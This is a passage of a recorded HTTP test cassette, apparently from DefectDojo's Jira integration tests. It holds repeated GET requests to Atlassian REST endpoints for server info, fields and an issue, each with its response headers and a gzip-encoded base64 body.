micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 75d3eb32-d4d2-4667-9ef9-083d98bf7402 + x-envoy-upstream-service-time: + - '27' + status: + code: 400 + message: Bad Request +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uutt1JmrTb3EQPKrIK2z2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7coUKRnk/KltYDCQj37j40dkIUwBaQAH5fnf7un94aa/b3Tp1 + cSLyLUEZZPCekQFn444T2tAeZ4wH7oxbhxjq1tEMvxEiU0Dwi3mvQgIZMJoDy1nVUipZLUteAMAN + RDjmPS6xtx2nK1vmQFsGknNZiqKq2R/bT49WuwjySohaU60R+bZptOJJo6I1q8SWRcFE31TNv4Jg + UsPTuCiS3tFqNeHZ9SrZJ2IuE0H7cdiT8/kHAAD//wMAr5Ok2loBAAA= + headers: + ATL-TraceId: + - 341b965d9214138e + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:35 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - a5a92993-5837-4e58-8081-a61db3e2c04e + x-envoy-upstream-service-time: + - '29' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 661261de04a56ca8 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:35 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - b4e4be39-0f8d-4a35-bc52-be57e488ce10 + x-envoy-upstream-service-time: + - '68' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10607 + response: + body: + string: !!binary | + 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 + GwAA + headers: + ATL-TraceId: + - c16ebf975c2f7d1b + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:35 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 1823721e-a8b7-428f-88ec-b748369e6051 + x-envoy-upstream-service-time: + - '131' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uutt1Jmma3uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7coUKRnk/KltYDCQj37j40dkIUwBaQAF5s799bR5e2ut2v05d + nIh8S1AGGbxnZMDZuOOENrTHGeOBO+PWIYa6dTTDb4TIFKj4xbxXIYEMGM2B5Uy0lEq2lSUvAOAG + IhzzHpfY247TlS1zoC0DybksRSFK/sf206PVLoJcVNVWU60R+a6uteJJo6JbJqodi4JVfS3qfwXB + pIancVEkvaPVasKz61WyT8RcJoL249CQ8/kHAAD//wMAmEAYrVoBAAA= + headers: + ATL-TraceId: + - d5cd75e55bc411d0 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:36 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - dfc55fc4-bb1c-4a63-8b95-640ed5e444f7 + x-envoy-upstream-service-time: + - '36' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 74aa2e5de3acb368 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:36 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - f7fae8d7-e261-40c7-aa96-208f6d45c96c + x-envoy-upstream-service-time: + - '65' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10607 + response: + body: + string: !!binary | + H4sIAAAAAAAAA6RWbW/bNhD+K4Q+DFtmWy92U1dAMaSJ12VL08x2WmBJYdDSWWIjkQJJWfba/vcd + SSlO0zprU+dDxCPv/bmH/ODBpqI89WJPAk9BQvo7gyJVPU5LUD2V5FDSnqhAUs0EVz1ImS5B016S + U55BIbLeGqTCPUinUElQwLU76/U8ZiyHwWHwFBcKihUuc60rFft+CitIdCreiwHVBVWKUT7goH20 + oX1aMT/ymVI1+J2BG9ii/vl8Mpv3R0+eoGRlg/XiD55Cp7VKqIZMyK0LLsUVKkRBFPaDYT8I51EQ + j0bxcDh4Mnz2axAGgYnR+NDbCqyZR8Zo9DHOIIh2WbtFCiqRrDIVQekRUSUtih5JmdKMJ5pUDBIg + 